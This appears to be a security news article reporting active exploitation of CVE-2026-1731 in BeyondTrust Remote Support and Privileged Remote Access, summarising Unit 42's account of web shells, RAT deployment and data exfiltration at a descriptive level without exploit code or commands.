BeyondTrust Flaw Used for Web Shells, Backdoors, and Data Exfiltration

Source: The Hacker News

BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA) products are being actively exploited in the wild through a critical flaw identified as CVE‑2026‑1731 (CVSS 9.9). The vulnerability allows attackers to execute operating‑system commands in the context of the site user via the “thin‑scc‑wrapper” script reachable through a WebSocket interface.

Vulnerability Overview

• CVE‑2026‑1731 – Sanitization failure in the “thin‑scc‑wrapper” script.
• Exploits a WebSocket endpoint to inject and run arbitrary shell commands.
• While the compromised account is not the root user, it grants control over the appliance’s configuration, managed sessions, and network traffic.

[Image: BeyondTrust appliance]

Exploitation in the Wild

Palo Alto Networks Unit 42 reported that threat actors are leveraging CVE‑2026‑1731 for:

• Network reconnaissance and lateral movement.
• Deployment of web shells and backdoors.
• Installation of remote‑management tools such as VShell and Spark RAT.
• Data exfiltration, including configuration files, internal databases, and full PostgreSQL dumps.

The campaign targets organizations in financial services, legal services, high‑technology, higher education, wholesale & retail, and healthcare across the United States, France, Germany, Australia, and Canada.

[Image: Gartner diagram]

Attack Techniques

• Custom Python script – Gains access to an administrative account.
• Web shell deployment – Multiple shells placed in various directories, including a PHP backdoor capable of executing raw PHP code without writing files, and a Bash dropper establishing a persistent shell.
• Malware installation – VShell and Spark RAT are dropped onto compromised systems.
• Out‑of‑band application security testing (OAST) – Used to verify successful code execution and fingerprint compromised hosts.
• Data staging & exfiltration – Commands are run to compress and transfer sensitive data to external servers.

[Image: Bash command execution]

Related Vulnerabilities

The report highlights a connection between CVE‑2026‑1731 and CVE‑2024‑12356, another input‑validation flaw affecting BeyondTrust products:

• CVE‑2024‑12356 – Insufficient validation in third‑party PostgreSQL components.
• Both vulnerabilities stem from localized validation issues in distinct execution pathways.

“CVE‑2024‑12356’s insufficient validation was using third‑party software (Postgres), while CVE‑2026‑1731’s insufficient validation problem occurred in the BeyondTrust Remote Support (RS) and older versions of the BeyondTrust Privileged Remote Access (PRA) codebase.” – Unit 42

[Image: ThreatLocker diagram]

CISA KEV Catalog Update

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE‑2026‑1731 to its Known Exploited Vulnerabilities (KEV) catalog, confirming exploitation in ransomware campaigns.

---

References

• CVE‑2026‑1731 details:
• Unit 42 analysis:
• VShell research:
• Spark RAT coverage:
• CVE‑2024‑12356 background:
• CISA KEV entry: